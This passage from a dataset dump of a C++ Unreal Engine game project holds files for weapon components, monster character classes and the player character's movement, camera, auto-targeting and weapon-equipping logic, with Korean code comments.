\"Project_Gun/Project_Gun.h\"\n\n#include <Components/ActorComponent.h>\n#include \"PG_ComponentWeapon.generated.h\"\n\n\nUCLASS( ClassGroup=(Custom), meta=(BlueprintSpawnableComponent) )\nclass PROJECT_GUN_API UPG_ComponentWeapon : public UActorComponent\n{\n\tGENERATED_BODY()\n\npublic:\t\n\t// Sets default values for this component's 
properties\n\tUPG_ComponentWeapon();\n\nprotected:\n\t// Called when the game starts\n\tvirtual void BeginPlay() override;\n\t\npublic:\t\n\t// Called every frame\n\tvirtual void TickComponent(float DeltaTime, ELevelTick TickType, FActorComponentTickFunction* ThisTickFunction) override;\n\n\t//bool EquipWeapon(const TSubclassOf<class APG_Weapon>& WeaponType);\n\tbool EquipWeapon(int32 nWeaponTableIndex);\n\tvoid UnEquipWeapon();\n\tbool IsEquipWeapon();\n\n\tvoid Fire();\n\tvoid StopFire();\n\n\tfloat GetAttackRange();\n\npublic :\n\tvoid OnDestroy();\n\t\nprotected :\n\tUPROPERTY(EditAnywhere, Category = \"PG Weapon\")\n\tint32 WeaponTableIndex;\n\n\tUPROPERTY(VisibleAnywhere, Category = \"PG WeaponType\")\n\tTWeakObjectPtr<class APG_Weapon> CurrentWeapon = nullptr;\n};\n" }, { "alpha_fraction": 0.7566224932670593, "alphanum_fraction": 0.7566224932670593, "avg_line_length": 21.370370864868164, "blob_id": "1090739a5b05fe2f9cd09d8c6f8927fb85650861", "content_id": "f43263c503064ed27b50dbc9583d68fd9396c6cb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 606, "license_type": "no_license", "max_line_length": 109, "num_lines": 27, "path": "/Source/Project_Gun/Public/Character/PG_MonCharNormal.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n#include \"Character/PG_MonChar.h\"\n\n#include \"PG_MonCharNormal.generated.h\"\n\n/**\n * \n */\nUCLASS()\nclass PROJECT_GUN_API APG_MonCharNormal : public APG_MonChar\n{\n\tGENERATED_BODY()\n\t\npublic :\n\tAPG_MonCharNormal();\n\n\tvirtual void BeginPlay() override;\n\tvirtual void PostInitializeComponents() override;\n\nprivate :\n\tUPROPERTY(EditAnywhere, BlueprintReadWrite, Category = \"PG MonsterInfo\", Meta = (AllowPrivateAccess = true))\n\tstruct FPGMonsterData_Normal MonsterNormalData;\n};\n" }, { "alpha_fraction": 0.7523809671401978, "alphanum_fraction": 0.7523809671401978, "avg_line_length": 18.6875, "blob_id": "6e49fe340cca072e1731ba230f8be4a5ec1bbe21", "content_id": "1014b8fefa7c61e89d675234bfc6ddeb09c1e4a9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 644, "license_type": "no_license", "max_line_length": 79, "num_lines": 32, "path": "/Source/Project_Gun/Public/BlueScriptObject/Weapon/PG_WeaponLaserBemGun.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n#include \"BlueScriptObject/Weapon/PG_Weapon.h\"\n\n#include \"PG_WeaponLaserBemGun.generated.h\"\n\n/**\n * \n */\nUCLASS()\nclass PROJECT_GUN_API APG_WeaponLaserBemGun : public APG_Weapon\n{\n\tGENERATED_BODY()\n\t\npublic:\n\tAPG_WeaponLaserBemGun();\n\n\tvirtual void PostInitializeComponents() override;\n\tvirtual void Destroyed() override;\n\npublic:\n\tvirtual void Fire() override;\n\tvirtual void StopFire() override;\n\nprivate:\n\tUPROPERTY()\n\tclass APG_Projectile* CurrFireLaserBeam;\t\t// 현재 쏘고있는 Shutgun Projectile\n\t\n};\n" }, { "alpha_fraction": 0.7395116090774536, "alphanum_fraction": 0.7461273670196533, "avg_line_length": 29.08576011657715, "blob_id": "bb0318b1febcfb4a3b47ece1c3ee7986a0f9b070", "content_id": "1d54d5008aa056c966fb09e068b318fdc5533f4d", "detected_licenses": [], "is_generated": false, "is_vendor": false, 
"language": "C++", "length_bytes": 19126, "license_type": "no_license", "max_line_length": 197, "num_lines": 618, "path": "/Source/Project_Gun/Private/Character/PG_MyChar.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#include \"Character/PG_MyChar.h\"\n#include \"Character/PG_MonChar.h\"\n#include \"BlueScriptObject/Weapon/PG_Weapon.h\"\n#include \"BlueScriptObject/Weapon/PG_WeaponRifle.h\"\n#include \"BlueScriptObject/Weapon/PG_WeaponGrenadeLauncher.h\"\n#include \"BlueScriptObject/Weapon/PG_WeaponLaserBemGun.h\"\n#include \"BlueScriptObject/Weapon/PG_WeaponFlameGun.h\"\n#include \"BlueScriptObject/LethalAttack/PG_LethalAttack.h\"\n#include \"BlueScriptObject/Projectile/PG_Projectile.h\"\n#include \"Player/PlayerController/PG_PlayerController.h\"\n#include \"Player/PlayerState/PG_MyPlayerState.h\"\n#include \"Game/GameState/PG_GameStateStage.h\"\n#include \"Game/GameInstance/PG_GameInstance.h\"\n#include \"Game/GameMode/PG_GameModeStage.h\"\n#include \"SaveData/PG_SavePlayerData.h\"\n#include \"Anim/PG_AnimIns_MyChar.h\"\n\n#include <Engine/SkeletalMeshSocket.h>\n#include <DrawDebugHelpers.h>\n\n// Sets default values\nAPG_MyChar::APG_MyChar()\n{\n \t// Set this character to call Tick() every frame. You can turn this off to improve performance if you don't need it.\n\tPrimaryActorTick.bCanEverTick = true;\n\n\t// CharacterMovement\n\tMaxSpeed = 0.0f;\n\tAccelerationSpeed = 0.0f;\n\tBodyRotateSpeed = 0.0f;\n\tMonsterTargetAngle = 0.0f;\n\tTargetRotation = FRotator::ZeroRotator;\n\n\t// 카메라 설정\n\t{\n\t\tSpringArm = CreateDefaultSubobject<USpringArmComponent>(TEXT(\"SPRINGARM\"));\n\t\tCamera = CreateDefaultSubobject<UCameraComponent>(TEXT(\"CAMERA\"));\n\n\t\tSpringArm->SetupAttachment(GetCapsuleComponent());\n\t\tCamera->SetupAttachment(SpringArm);\n\n\t\tGetMesh()->SetRelativeLocationAndRotation(FVector(0.0f, 0.0f, -88.0f), FRotator(0.0f, -90.0f, 0.0f));\n\t\tSpringArm->TargetArmLength = 400.0f;\n\t\tSpringArm->SetRelativeRotation(FRotator(-15.0f, 0.0f, 0.0f));\n\n\t\t// 화면비율 조정\n\t\tCamera->bConstrainAspectRatio = false;\t// false : 어느 디바이스에서든 동일한 비율로 출력하게 한다.\n\t}\n\n\t// 기본 캐릭터 설정\n\t//{\n\t\t// 스켈레탈\n\t\t//static ConstructorHelpers::FObjectFinder<USkeletalMesh>\tSK_DEFAULT_CHARACTER(TEXT(\"SkeletalMesh'/Game/PG/Meshs/Player/GunCH_Skel.GunCH_Skel'\"));\n\t\t//if (SK_DEFAULT_CHARACTER.Succeeded())\n\t\t//{\n\t\t//\tGetMesh()->SetSkeletalMesh(SK_DEFAULT_CHARACTER.Object);\n\t\t//}\n\n\t\t//// 애니메이션 블루프린트\n\t\t//GetMesh()->SetAnimationMode(EAnimationMode::AnimationBlueprint);\n\t\t//static ConstructorHelpers::FClassFinder<UAnimInstance> WARRIOR_ANIM(TEXT(\"AnimBlueprint'/Game/PG/Blueprints/Anim/BP_MyCharacter_Work.BP_MyCharacter_Work_C'\"));\n\t\t//if (WARRIOR_ANIM.Succeeded())\n\t\t//{\n\t\t//\tGetMesh()->SetAnimInstanceClass(WARRIOR_ANIM.Class);\n\t\t//}\n\t//}\n\t\n\t{\n\t\t// 콜리전 설정\n\t\tGetCapsuleComponent()->SetCollisionProfileName(TEXT(\"MyCharacter\"));\n\t\tGetCapsuleComponent()->OnComponentBeginOverlap.AddDynamic(this, &APG_MyChar::OnGenerateOverlabEvent);\n\t}\n}\n\n// Called when the game starts or when spawned\nvoid APG_MyChar::BeginPlay()\n{\n\tSuper::BeginPlay();\n\n\tm_pPlayerContorller = Cast<APG_PlayerController>(GetController());\n\n\t{\n\t\t// 기본 무기 장착\n\t\tauto pGameModeStage = Cast<APG_GameModeStage>(GetWorld()->GetAuthGameMode());\n\t\tABCHECK(nullptr != pGameModeStage);\n\n\t\tauto pSavePlayerData = 
pGameModeStage->GetSavePlayerData();\n\t\tEquipWeapon(pSavePlayerData->m_kEquipWeaponTableIndex[0]);\n\t}\n\n\t{\n\t\tauto AMyPlayerState = Cast<APG_MyPlayerState>(GetPlayerState());\n\t\tABCHECK(nullptr != AMyPlayerState);\n\t\tAMyPlayerState->OnDefaultAttackMonsterKill.AddUObject(this, &APG_MyChar::OnDefaultAttackMonsterKill);\n\t\tAMyPlayerState->OnChangeWeapon.AddUObject(this, &APG_MyChar::OnChangeWeapon);\n\t}\n}\n\nvoid APG_MyChar::PostInitializeComponents()\n{\n\tSuper::PostInitializeComponents();\n\n\tUPG_GameInstance* pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\tif (pGameInstance)\n\t{\n\t\tMaxSpeed = pGameInstance->GetTableCharacterMovementData()->MaxSpeed;\n\t\tAccelerationSpeed = pGameInstance->GetTableCharacterMovementData()->AccelerationSpeed;\n\t\tBodyRotateSpeed = pGameInstance->GetTableCharacterMovementData()->BodyRotateSpeed;\n\t\tAttackBodyRotateSpeed = pGameInstance->GetTableCharacterMovementData()->AttackBodyRotateSpeed;\n\t\tAttackUpperBodyRotateSpeed = pGameInstance->GetTableCharacterMovementData()->AttackUpperBodyRotateSpeed;\n\n\t\tPitch = pGameInstance->GetTableCharacterCameraData()->Pitch;\n\t\tYaw = pGameInstance->GetTableCharacterCameraData()->Yaw;\n\t\tRoll = pGameInstance->GetTableCharacterCameraData()->Roll;\n\t\tArmLength = pGameInstance->GetTableCharacterCameraData()->ArmLength;\n\t\tFov = pGameInstance->GetTableCharacterCameraData()->Fov;\n\t\tScreenY = pGameInstance->GetTableCharacterCameraData()->ScreenY;\n\n\t\t// 스크린 화면 기준 카메라 Y축 이동\n\t\tFVector vWorldBack(0.f, 0.f, ScreenY);\n\t\tFVector vCamVector = Camera->GetRelativeTransform().GetLocation() + vWorldBack;\n\t\tCamera->SetRelativeLocation(vCamVector);\n\n\t\tUpdateMovementData();\n\t}\n\n\tABAnimInstance = Cast<UPG_AnimIns_MyChar>(GetMesh()->GetAnimInstance());\n\tABCHECK(nullptr != ABAnimInstance);\n\tABAnimInstance->OnFire.AddUObject(this, &APG_MyChar::Fire);\n\n\tSetCameraView(ECameraView::eCV_QuaterView);\n}\n\nvoid APG_MyChar::OnConstruction(const FTransform& Transform)\n{\n\tSuper::OnConstruction(Transform);\n\t// 에디터 작업에서 선택한 액터의 속성이나 트랜스폼 정보가 변경될 때 호출된다.\n}\n\nvoid APG_MyChar::FellOutOfWorld(const UDamageType & dmgType)\n{\n\tif (dmgType.bCausedByWorld)\n\t\tOnPlayerWorldOut();\n\telse\n\t\tSuper::FellOutOfWorld(dmgType);\n}\n\n// Called every frame\nvoid APG_MyChar::Tick(float DeltaTime)\n{\n\tSuper::Tick(DeltaTime);\n\n//#ifdef TEST_CODE\n\t// 임시코드 : 개발 테스트 코드 (배포시 삭제)\n\t//{\n\t//\tUpdateMovementData();\n\t//\tSetCameraView(ECameraView::eCV_QuaterView);\n\t//}\n//#endif\n\t\n\tUpdateMovement(DeltaTime);\n\tUpdateRotation(DeltaTime);\n\tUpdateCamera(DeltaTime);\n}\n\n// Called to bind functionality to input\nvoid APG_MyChar::SetupPlayerInputComponent(UInputComponent* PlayerInputComponent)\n{\n\tSuper::SetupPlayerInputComponent(PlayerInputComponent);\n\n\tPlayerInputComponent->BindAxis(TEXT(\"UpDown\"), this, &APG_MyChar::UpDown);\n\tPlayerInputComponent->BindAxis(TEXT(\"LeftRight\"), this, &APG_MyChar::LeftRight);\n\n\tPlayerInputComponent->BindAction(\"Fire\", IE_Released, this, &APG_MyChar::Fire);\n\n#ifdef TEST_CODE\n\t// Weapon Test Code\n\tPlayerInputComponent->BindAction(\"Weapon_Rifle\", IE_Released, this, &APG_MyChar::WeaponEquipRlife);\n\tPlayerInputComponent->BindAction(\"Weapon_Flame\", IE_Released, this, &APG_MyChar::WeaponEquipFlame);\n\tPlayerInputComponent->BindAction(\"Weapon_Shutgun\", IE_Released, this, &APG_MyChar::WeaponEquipShutgun);\n\tPlayerInputComponent->BindAction(\"Weapon_LaserBeam\", IE_Released, this, 
&APG_MyChar::WeaponEquipLaserBeam);\n\tPlayerInputComponent->BindAction(\"Weapon_GrandleLauncher\", IE_Released, this, &APG_MyChar::WeaponEquipGrandleLauncher);\n#endif // TEST_CODE\n}\n\nvoid APG_MyChar::UpdateRotation(float DeltaTime)\n{\n\tAPG_MonChar* pPG_MonChar = FindTargetToMonster();\n\tif (pPG_MonChar)\n\t{\n\t\t// 하체(Root) 회전 ==========================================================\n\t\tFRotator PlayerRot = UKismetMathLibrary::FindLookAtRotation(GetActorLocation(), pPG_MonChar->GetActorLocation());\n\t\tFRotator rotator = FMath::RInterpTo(TargetRotation, PlayerRot, DeltaTime, AttackBodyRotateSpeed);\n\t\trotator.Pitch = 0.0f;\n\t\tTargetRotation = rotator;\n\t\tSetActorRotation(rotator);\n\n\t\t// 상체(Aim Offset) 회전 ==========================================================\n\t\tFVector vLookAt = GetActorForwardVector();\n\t\tvLookAt.Z = 0.0f;\n\n\t\tFVector vTarget = pPG_MonChar->GetActorLocation() - GetActorLocation();\n\t\tvTarget.Z = 0.0f;\n\t\tvTarget.Normalize();\n\n\t\t// 내적 (캐릭터와 몬스터간의 각도)\n\t\tfloat NewTargetAngle = (FMath::Acos(FVector::DotProduct(vLookAt, vTarget))) * 57.29578F;\n\t\t\n\t\t// 외적 (적이 왼쪽 또는 오른쪽에 있는지 확인)\n\t\tFVector Cross = FVector::CrossProduct(vLookAt, vTarget);\n\t\tif (Cross.Z < 0)\n\t\t\tNewTargetAngle *= -1;\n\n\t\t// 몬스터 조준 및 해제\n\t\tif (-45.0f <= NewTargetAngle && NewTargetAngle <= 45.0f)\t\n\t\t\tMonsterTargetAngle = FMath::FInterpTo(MonsterTargetAngle, NewTargetAngle, DeltaTime, AttackUpperBodyRotateSpeed);\n\t\telse\n\t\t\tMonsterTargetAngle = FMath::FInterpTo(MonsterTargetAngle, 0.0f, DeltaTime, AttackUpperBodyRotateSpeed);\n\n\t\tABAnimInstance->SetRotation(MonsterTargetAngle);\n\n\n//#ifdef ENABLE_DRAW_DEBUG\n//\t\t//FString DebugMsg = FString::Printf(TEXT(\"Yaw : %f / %f\"), NewTargetAngle, MonsterTargetAngle);\n//\t\t//GEngine->AddOnScreenDebugMessage(-1, 1.0f, FColor::Yellow, DebugMsg);\n//\t\tDrawDebugPoint(GetWorld(), GetActorLocation() + (vLookAt * 200), 10.0f, FColor::Red, false, 0.02f);\n//\t\tDrawDebugLine(GetWorld(), GetActorLocation(), GetActorLocation() + (vLookAt * 200), FColor::Red, false, 0.02f);\n//#endif\n\t}\n\telse\n\t{\n\t\tfloat angle = FMath::FInterpTo(MonsterTargetAngle, 0.0f, DeltaTime, AttackUpperBodyRotateSpeed);\n\t\tMonsterTargetAngle = angle;\n\t\tABAnimInstance->SetRotation(angle);\n\n\t\tTargetRotation = GetActorRotation();\n\t}\n\n\tif (ABAnimInstance)\n\t\tABAnimInstance->OnTargetMonster(pPG_MonChar);\n\n\tif (CurrentWeapon.IsValid(true) && nullptr == pPG_MonChar)\n\t\tCurrentWeapon->StopFire();\n}\n\nvoid APG_MyChar::UpdateCamera(float DeltaTime)\n{\n\tSpringArm->TargetArmLength = FMath::FInterpTo(SpringArm->TargetArmLength, ArmLength, DeltaTime, ArmLengthSpeed);\n\n\tswitch (m_eCurrentCameraView)\n\t{\n\tcase ECameraView::eCV_QuaterView:\n\t\tSpringArm->SetRelativeRotation(FMath::RInterpTo(SpringArm->GetRelativeRotation(), ArmRotationTo, DeltaTime, ArmRotationSpeed));\n\t\tbreak;\n\t}\n}\n\nvoid APG_MyChar::UpdateMovement(float DeltaTime)\n{\n\tswitch (m_eCurrentCameraView)\n\t{\n\tcase ECameraView::eCV_QuaterView:\n\t\tif (DirectionToMove.SizeSquared() > 0.0f)\n\t\t{\n\t\t\tAddMovementInput(DirectionToMove);\n\t\t}\n\n\t\tbreak;\n\t}\n}\n\nvoid APG_MyChar::OnGenerateOverlabEvent(UPrimitiveComponent* OverlappedComp, AActor* OtherActor, UPrimitiveComponent* OtherComp, int32 OtherBodyIndex, bool bFromWeep, const FHitResult& SweepResult)\n{\n\tauto pMonChar = Cast<APG_MonChar>(OtherActor);\n\tif (pMonChar)\n\t{\n\t\tOnAttackedByMonster();\n\t\treturn;\n\t}\n}\n\nvoid 
APG_MyChar::OnAttackedByMonster()\n{\n\tauto AGameStateStage = Cast<APG_GameStateStage>(GetWorld()->GetGameState());\n\tif (AGameStateStage)\n\t\tAGameStateStage->OnCheckStageFailed();\n}\n\nvoid APG_MyChar::OnPlayerWorldOut()\n{\n\tif (m_pPlayerContorller)\n\t{\n\t\tm_pPlayerContorller->RestartLevel();\n\t\tABLOG_S(Warning);\n\t}\n}\n\nvoid APG_MyChar::OnDefaultAttackMonsterKill(APG_MonChar* AMon)\n{\n\tif (false == CurrentLethalAttack.IsValid())\n\t{\n\t\tEquipLethalAttack(0);\n\n\t\tauto MyPlayerState = Cast<APG_MyPlayerState>(GetPlayerState());\n\t\tif (MyPlayerState)\n\t\t\tMyPlayerState->ReadyToUseTheSkill();\n\t}\n}\n\nvoid APG_MyChar::OnChangeWeapon(int32 nWeaponTableIndex)\n{\n\tif (EquipWeapon(nWeaponTableIndex))\n\t{\n\t\t//auto MyPlayerState = Cast<APG_MyPlayerState>(GetPlayerState());\n\t\t//if (MyPlayerState)\n\t\t//\tMyPlayerState->\n\t}\n\t//ABCHECK(EquipWeapon(EquipWeaponClass));\n}\n\nvoid APG_MyChar::SetCameraView(ECameraView eCameraView)\n{\n\tswitch (eCameraView)\n\t{\n\tcase ECameraView::eCV_QuaterView:\n\t{\n\t\tArmLengthTo = ArmLength;\n\t\tArmRotationTo = FRotator(Pitch, Yaw, Roll);\n\t\tSpringArm->bUsePawnControlRotation = false;\n\t\tSpringArm->bInheritPitch = false;\n\t\tSpringArm->bInheritRoll = false;\n\t\tSpringArm->bInheritYaw = false;\n\t\tSpringArm->bDoCollisionTest = false;\n\t\tbUseControllerRotationYaw = false;\n\n\t\tGetCharacterMovement()->bOrientRotationToMovement = true;\n\t\tGetCharacterMovement()->bUseControllerDesiredRotation = true;\n\t\tGetCharacterMovement()->RotationRate = FRotator(0.0f, BodyRotateSpeed, 0.0f);\n\n\t\tCamera->SetFieldOfView(Fov);\n\n\t\tbreak;\n\t}\n\tcase ECameraView::eCV_Fly:\n\t{\n\t\tbreak;\n\t}\n\tdefault:\n\t{\n\t\tbreak;\n\t}\n\t}\n}\n\nvoid APG_MyChar::UpDown(float NewAxisValue)\n{\n\tDirectionToMove.Y = -NewAxisValue;\n}\n\nvoid APG_MyChar::LeftRight(float NewAxisValue)\n{\n\tDirectionToMove.X = NewAxisValue;\n}\n\nvoid APG_MyChar::TouchReleased()\n{\n\tif (CurrentLethalAttack.IsValid())\n\t{\n\t\tauto MyPlayerState = Cast<APG_MyPlayerState>(GetPlayerState());\n\t\tif (MyPlayerState)\n\t\t\tMyPlayerState->TryUseTheSkill();\n\t}\n}\n\nvoid APG_MyChar::UpdateMovementData()\n{\n\tABCHECK(nullptr != GetCharacterMovement());\n\n\tGetCharacterMovement()->MaxWalkSpeed = MaxSpeed;\n\tGetCharacterMovement()->MaxAcceleration = AccelerationSpeed;\n\tGetCharacterMovement()->RotationRate = FRotator(0.0f, BodyRotateSpeed, 0.0f);\n}\n\nfloat APG_MyChar::GetMaxSpeed()\n{\n\treturn GetCharacterMovement() ? GetCharacterMovement()->MaxWalkSpeed : 0.0f;\n}\n\nfloat APG_MyChar::GetAttackRange()\n{\n\treturn CurrentWeapon.IsValid(true) ? 
CurrentWeapon->GetAttackRange() : 0.0f;\n}\n\nvoid APG_MyChar::Fire()\n{\n\tif (false == ABAnimInstance->IsAimingComplete())\n\t\treturn;\n\n\tif (CurrentWeapon.IsValid(true))\n\t\tCurrentWeapon->Fire();\n\n\tm_pPlayerContorller->OnFire();\n}\n\nbool APG_MyChar::EquipLethalAttack(int32 LethalAttackID)\n{\n\tauto GameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\tABCHECK(nullptr != GameInstance, false);\n\n\tconst FPGLethalAttackData* FLethalAttackData = GameInstance->GetTableLethalAttackData(LethalAttackID);\n\tABCHECK(nullptr != FLethalAttackData, false);\n\n\tAPG_LethalAttack* NewLethalAttack = GetWorld()->SpawnActor<APG_LethalAttack>(FLethalAttackData->BLethalAttack, FVector::ZeroVector, FRotator::ZeroRotator);\n\tABCHECK(nullptr != NewLethalAttack, false);\n\n\tNewLethalAttack->SetLethaAttackData(FLethalAttackData);\n\n\tif (false == SetLethalAttack(NewLethalAttack))\n\t{\n\t\tCurrentLethalAttack->UnBindPlayerState(Cast<APG_MyPlayerState>(GetPlayerState()));\n\t\tCurrentLethalAttack->Destroy();\n\t\treturn false;\n\t}\n\n\treturn true;\n}\n\nbool APG_MyChar::UnEquipLethalAttack()\n{\n\tif(CurrentLethalAttack.IsValid())\n\t{\n\t\tCurrentLethalAttack->UnBindPlayerState(Cast<APG_MyPlayerState>(GetPlayerState()));\n\t\tCurrentLethalAttack = nullptr;\n\t}\n\n\treturn true;\n}\n\nbool APG_MyChar::SetLethalAttack(class APG_LethalAttack* NewLethalAttack)\n{\n\tif (CurrentLethalAttack.IsValid())\n\t{\n\t\tCurrentLethalAttack->DetachFromActor(FDetachmentTransformRules::KeepWorldTransform);\n\t\tCurrentLethalAttack->UnBindPlayerState(Cast<APG_MyPlayerState>(GetPlayerState()));\n\t\tCurrentLethalAttack->Destroy();\n\t\tCurrentLethalAttack = nullptr;\n\t}\n\n\tif (NewLethalAttack)\n\t{\n\t\tNewLethalAttack->AttachToComponent(RootComponent, FAttachmentTransformRules::SnapToTargetNotIncludingScale);\n\t\tNewLethalAttack->SetOwner(this);\n\t\tNewLethalAttack->BindPlayerState(Cast<APG_MyPlayerState>(GetPlayerState()));\n\t\tCurrentLethalAttack = NewLethalAttack;\n\n\t\tABLOG(Warning, TEXT(\"Equip Skill : %s\"), *NewLethalAttack->GetName());\n\t}\n\n\treturn true;\n}\n\n#ifdef TEST_CODE\nvoid APG_MyChar::WeaponEquipRlife()\n{\n\tauto Weapon = LoadClass<APG_Weapon>(NULL, TEXT(\"Blueprint'/Game/PG/Blueprints/Weapon/BP_Weapon_Rifle.BP_Weapon_Rifle_C'\"));\n\tABCHECK(EquipWeapon(0));\n}\n\nvoid APG_MyChar::WeaponEquipFlame()\n{\n\tauto Weapon = LoadClass<APG_Weapon>(NULL, TEXT(\"Blueprint'/Game/PG/Blueprints/Weapon/BP_Weapon_FlameGun.BP_Weapon_FlameGun_C'\"));\n\tABCHECK(EquipWeapon(1));\n}\n\nvoid APG_MyChar::WeaponEquipShutgun()\n{\n\tauto Weapon = LoadClass<APG_Weapon>(NULL, TEXT(\"Blueprint'/Game/PG/Blueprints/Weapon/BP_Weapon_ShotGun.BP_Weapon_ShotGun_C'\"));\n\tABCHECK(EquipWeapon(2));\n}\n\nvoid APG_MyChar::WeaponEquipLaserBeam()\n{\n\tauto Weapon = LoadClass<APG_Weapon>(NULL, TEXT(\"Blueprint'/Game/PG/Blueprints/Weapon/BP_Weapon_LaserBemGun.BP_Weapon_LaserBemGun_C'\"));\n\tABCHECK(EquipWeapon(3));\n}\n\nvoid APG_MyChar::WeaponEquipGrandleLauncher()\n{\n\tauto Weapon = LoadClass<APG_Weapon>(NULL, TEXT(\"Blueprint'/Game/PG/Blueprints/Weapon/BP_Weapon_GraenadeLauncher.BP_Weapon_GraenadeLauncher_C'\"));\n\tABCHECK(EquipWeapon(4));\n}\n#endif // TEST_CODE\n\nbool APG_MyChar::EquipWeapon(int32 nWeaponTalbeIndex)\n{\n\tauto pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\tABCHECK(nullptr != pGameInstance, false);\n\n\tauto pWeaponTableData = pGameInstance->GetWeaponTableData(nWeaponTalbeIndex);\n\tABCHECK(nullptr != pWeaponTableData, false);\n\n\tAPG_Weapon* 
NewWeapon = GetWorld()->SpawnActor<APG_Weapon>(pWeaponTableData->BPWeapon, FVector::ZeroVector, FRotator::ZeroRotator);\n\tABCHECK(nullptr != NewWeapon, false);\n\n\tif (NewWeapon->SetWeaponData(nWeaponTalbeIndex) && false == SetWeapon(NewWeapon))\n\t{\n\t\tABLOG(Error, TEXT(\"SetWeapon Failed!! (TableIndex : %d)\"), nWeaponTalbeIndex);\n\t\tNewWeapon->Destroy();\n\t\tNewWeapon = nullptr;\n\n\t\treturn false;\n\t}\n\n\treturn true;\n}\n\n// PlayerState 로 옮기는 작업 필요\nbool APG_MyChar::SetWeapon(APG_Weapon* NewWeapon)\n{\n\tif (CurrentWeapon.IsValid(true))\n\t{\n\t\tABLOG(Warning, TEXT(\"Unequip Weapon : %s\"), *CurrentWeapon->GetName());\n\n\t\tCurrentWeapon->DetachFromActor(FDetachmentTransformRules::KeepWorldTransform);\n\t\tCurrentWeapon->Destroy();\n\t\tCurrentWeapon = nullptr;\n\t}\n\n\tif (NewWeapon)\n\t{\n\t\tFName CharacterGunSocket(TEXT(\"Bip001-L-GunSocket\"));\n\t\tNewWeapon->AttachToComponent(GetMesh(), FAttachmentTransformRules::SnapToTargetNotIncludingScale, CharacterGunSocket);\n\t\tNewWeapon->SetOwner(this);\n\t\tCurrentWeapon = NewWeapon;\n\t\tABAnimInstance->SetMontageFireReaction(CurrentWeapon->GetMontageFireReaction());\n\n\t\tABLOG(Warning, TEXT(\"Equip Weapon : %s\"), *NewWeapon->GetName());\n\t}\n\n\treturn true;\n}\n\n// APG_Weapon 으로 함수 옮기는 작업 필요.\nAPG_MonChar* APG_MyChar::FindTargetToMonster()\n{\n\tAPG_MonChar* pFindTarget = nullptr;\n\t// 캐릭터 시야 내 주변 몬스터를 찾아 공격 애니메이션을 실행한다.\n\t// 실제 총알 발사는 공격 애니메이션의 애님 노티파이를 이용한다.\n\tif (CurrentWeapon.IsValid(true))\n\t{\n\t\tfloat fAttackRange = CurrentWeapon->GetAttackRange();\n\n\t\tTArray<FHitResult> HitResult;\n\t\tFCollisionQueryParams Params(NAME_None, false, this);\n\t\t\n\t\tbool bResult = GetWorld()->SweepMultiByChannel(\n\t\t\tHitResult,\n\t\t\tGetActorLocation(),\n\t\t\tGetActorLocation(),\n\t\t\tFQuat::Identity,\n\t\t\tECollisionChannel::ECC_GameTraceChannel4,\n\t\t\tFCollisionShape::MakeSphere(fAttackRange),\n\t\t\tParams);\n\n//#ifdef ENABLE_DRAW_DEBUG\n//\t\tFVector TraceVec = GetActorForwardVector() * fAttackRange;\n//\t\tFVector Center = GetActorLocation();\n//\t\tfloat HalfHeight = fAttackRange;\n//\t\tFQuat CapsuleRot = FRotationMatrix::MakeFromZ(TraceVec).ToQuat();\n//\t\tFColor DrawColor = bResult ? 
FColor::Green : FColor::Red;\n//\t\tfloat DebugLifeTime = 0.02f;\n//\n//\t\tDrawDebugCapsule(GetWorld(),\n//\t\t\tCenter,\n//\t\t\tHalfHeight,\n//\t\t\tfAttackRange,\n//\t\t\tCapsuleRot,\n//\t\t\tDrawColor,\n//\t\t\tfalse,\n//\t\t\tDebugLifeTime);\n//#endif\n\n\t\tif (bResult)\n\t\t{\n\t\t\t// 캐릭터로부터 가장 가까운 몬스터를 찾아 타겟으로 정한다.\n\t\t\tfloat fFindNearDistance = fAttackRange;\n\t\t\tfor (auto Monster : HitResult)\n\t\t\t{\n\t\t\t\tif (nullptr == Monster.GetActor())\n\t\t\t\t\tcontinue;\n\n\t\t\t\tfloat fDistance = GetDistanceTo(Monster.GetActor());\n\t\t\t\tif (fDistance < fFindNearDistance)\n\t\t\t\t{\n\t\t\t\t\tfFindNearDistance = fDistance;\n\t\t\t\t\tpFindTarget = Cast<APG_MonChar>(Monster.GetActor());\n\t\t\t\t}\n\t\t\t}\n//#ifdef ENABLE_DRAW_DEBUG\n//\t\t\tif (pFindTarget)\n//\t\t\t{\n//\t\t\t\tDrawDebugPoint(GetWorld(), pFindTarget->GetActorLocation(), 10.0f, FColor::Yellow, false, 0.02f);\n//\t\t\t\tDrawDebugLine(GetWorld(), GetActorLocation(), pFindTarget->GetActorLocation(), FColor::Yellow, false, 0.02f);\n//\t\t\t}\n//#endif\n\t\t}\n\t}\n\n\treturn pFindTarget;\n}\n\nbool APG_MyChar::IsTargetMonster()\n{\n\tABCHECK(nullptr != ABAnimInstance, false);\n\treturn ABAnimInstance->IsVaildTargetMonster();\n}" }, { "alpha_fraction": 0.7132353186607361, "alphanum_fraction": 0.716911792755127, "avg_line_length": 21.75, "blob_id": "444b7a9fd0192ff348a4a4ce6d1ab454f3125bd9", "content_id": "de0b5341292e2d0eed3ee36d3e1ab7a04ec22608", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 378, "license_type": "no_license", "max_line_length": 79, "num_lines": 12, "path": "/Source/Project_Gun/Public/Character/PG_CharDefine.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#pragma once\n\nUENUM(BlueprintType)\nenum class ECharacterState : uint8\n{\n\tPREINIT,\t// 캐릭터 생선 전의 스테이트\n\tLOADING,\t// 선택한 캐릭터 애셋을 로딩하는 